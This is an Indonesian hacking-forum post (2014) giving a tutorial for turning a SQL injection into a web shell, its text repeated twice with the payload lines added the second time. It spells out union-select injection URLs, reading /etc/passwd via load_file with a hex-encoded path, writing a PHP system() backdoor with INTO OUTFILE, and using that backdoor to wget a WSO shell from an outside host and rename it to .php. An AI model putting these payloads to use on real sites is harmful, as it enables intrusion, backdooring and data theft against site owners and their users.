12-23-2014, 10:08 PM
SQL Injection Into Out File (Upload Shell Vulneralibity) - Halooo... apa kabar saudara saudara ku hehehehehe
Aku mau post sebuah teknik dimana baru saja aku pelajari tadi ya jadi nya begini belum ahli cuma karena keantusiasan saya mau berbagi dengan teman teman jadi saya post lah disini kita belajar bareng bareng oke
Seperti yang kita tau bahwa untuk menanam sebuah shell biasa nya kita harus login pada sebuah web jika kita menggunakan teknik SQLi kecuali jika kita menggunakan teknik kayak XSS, LFI/RFI atau exploit uploadify kaya wp-store atau csrf dimana kita bisa mengupload shell atau backdor kita tanpa hak akses root didalam panel admin. Nah bagaimana jika sqli yg notabene kita dipaksa harus hash password dan find admin page wkwkwkwk merepotkan juga ya
*skip skip kmon lets go to tkp :v
[!] Persiapan
1. Koneksi internet
2. Target vuln SQLi
3. kopi
-Step One
Kalau ketemu target tambahin symbol ' biar tau vuln atau kagak
Kalau vuln langsung kita injek seperti biasa
1. Cari jumlah kolom dengan order by
2. Cari angka cantik dengn union select
Nah gambar dibawah ini kan kelihat angka cantik pada web yg aku injek
-Step Two
Kita coba lihat /etc/passwd dengan cara menambahkan
load_file(/etc/passwd) pada di angka 4
loh kok hasilnya gak keluar /etc/passwd malah error
Woles woles mari kita bypass
convert /etc/passwd ke hexadecimal
Hasilnya 2f6574632f706173737764 maka kita tambahkan 0x di depanya
0x2f6574632f706173737764
Nanti ada gambar kayak dibawah ini
Kok cuman user root doang yang muncul..
tenang coba ctrl + u / view- source
-Step Three
Lanjut ke tahap upload shell
pertama kita tanam cmd.php yang berfungsi untuk mengeksekusi command
<?php system($_GET[cmd]);?> : Ini script untuk mengeksekusi command dari server
into outfile "/home/webcouncil/public_html/cmd.php" : ini perintah untuk menanam script tadi dengan nama file cmd.php di direktori public_html
loh kok bisa tau kalau pathnya /home/localhost/public_html/
ingat error di web tadi?
Nah dari situ saya tau pathnya
trus load url tadi dan hasilnya malah error :
Tenang saja cuma error tapi masih bisa kok
kita coba cek localhost/cmd.php
Tara ^_^ hasilnya nanti memang blank tapi bukan 404 not found lo yaa
lalu kita coba eksekusi command untuk upload shell
Kita pakai wget untuk upload shell..
tapi shell harus berformat txt
trus rename wso.txt menjadi wso.php
Terakhir sudah ada kan shell nya?
"Kak Malaikat, Kok Aku Gak Bisa?" Aku juga gam bisa kakak tapi aku pelajari aja terus kadang bisa kadang enggak
Hehehehe... demikian thread dari saya, mohon maaf kalau misal repost atau gak keren
Buat yg kawan nimbrung dimari yuk kasih ilmu nya juga
Special Thanks To: X Inject, Rebels, And All Member IBT
Aku mau post sebuah teknik dimana baru saja aku pelajari tadi ya jadi nya begini belum ahli cuma karena keantusiasan saya mau berbagi dengan teman teman jadi saya post lah disini kita belajar bareng bareng oke
Seperti yang kita tau bahwa untuk menanam sebuah shell biasa nya kita harus login pada sebuah web jika kita menggunakan teknik SQLi kecuali jika kita menggunakan teknik kayak XSS, LFI/RFI atau exploit uploadify kaya wp-store atau csrf dimana kita bisa mengupload shell atau backdor kita tanpa hak akses root didalam panel admin. Nah bagaimana jika sqli yg notabene kita dipaksa harus hash password dan find admin page wkwkwkwk merepotkan juga ya
*skip skip kmon lets go to tkp :v
[!] Persiapan
1. Koneksi internet
2. Target vuln SQLi
3. kopi
-Step One
Kalau ketemu target tambahin symbol ' biar tau vuln atau kagak
Kalau vuln langsung kita injek seperti biasa
1. Cari jumlah kolom dengan order by
2. Cari angka cantik dengn union select
Nah gambar dibawah ini kan kelihat angka cantik pada web yg aku injek
-Step Two
Kita coba lihat /etc/passwd dengan cara menambahkan
load_file(/etc/passwd) pada di angka 4
Quote:Localhost/archive.php?id=-1 union select 1,2,3,load_file(/etc/passwd),5--+
loh kok hasilnya gak keluar /etc/passwd malah error
Woles woles mari kita bypass
convert /etc/passwd ke hexadecimal
Hasilnya 2f6574632f706173737764 maka kita tambahkan 0x di depanya
0x2f6574632f706173737764
Quote:Localhost/archive.php?id=-1 union select 1,2,3,load_file(0x2f6574632f706173737764),5--+
Nanti ada gambar kayak dibawah ini
Kok cuman user root doang yang muncul..
tenang coba ctrl + u / view- source
-Step Three
Lanjut ke tahap upload shell
pertama kita tanam cmd.php yang berfungsi untuk mengeksekusi command
Quote:Localhost/archive.php?id=-1 uniOn SelEcT 1,'<?php system($_GET[cmd]);?>',3,4 into outfile "/home/webcouncil/public_html/cmd.php"--+
<?php system($_GET[cmd]);?> : Ini script untuk mengeksekusi command dari server
into outfile "/home/webcouncil/public_html/cmd.php" : ini perintah untuk menanam script tadi dengan nama file cmd.php di direktori public_html
loh kok bisa tau kalau pathnya /home/localhost/public_html/
ingat error di web tadi?
Quote:" Warning: mysql_num_rows() expects parameter 3 to be resource, boolean given in /home/webcouncil/public_html/archive.php on line 12 "
Nah dari situ saya tau pathnya
trus load url tadi dan hasilnya malah error :
Quote:Cannot execute a blank command in /home/localhost/cmd.php on line 1
Tenang saja cuma error tapi masih bisa kok
kita coba cek localhost/cmd.php
Tara ^_^ hasilnya nanti memang blank tapi bukan 404 not found lo yaa
lalu kita coba eksekusi command untuk upload shell
Quote:localhost/cmd.php?cmd=[command]
Kita pakai wget untuk upload shell..
tapi shell harus berformat txt
Quote:localhost/cmd.php?cmd=wget http://files.xakep.biz/shells/PHP/wso.txt
trus rename wso.txt menjadi wso.php
Quote:localhost/cmd.php?cmd=mv wso.txt wso.php
Terakhir sudah ada kan shell nya?
"Kak Malaikat, Kok Aku Gak Bisa?" Aku juga gam bisa kakak tapi aku pelajari aja terus kadang bisa kadang enggak
Hehehehe... demikian thread dari saya, mohon maaf kalau misal repost atau gak keren
Buat yg kawan nimbrung dimari yuk kasih ilmu nya juga
Special Thanks To: X Inject, Rebels, And All Member IBT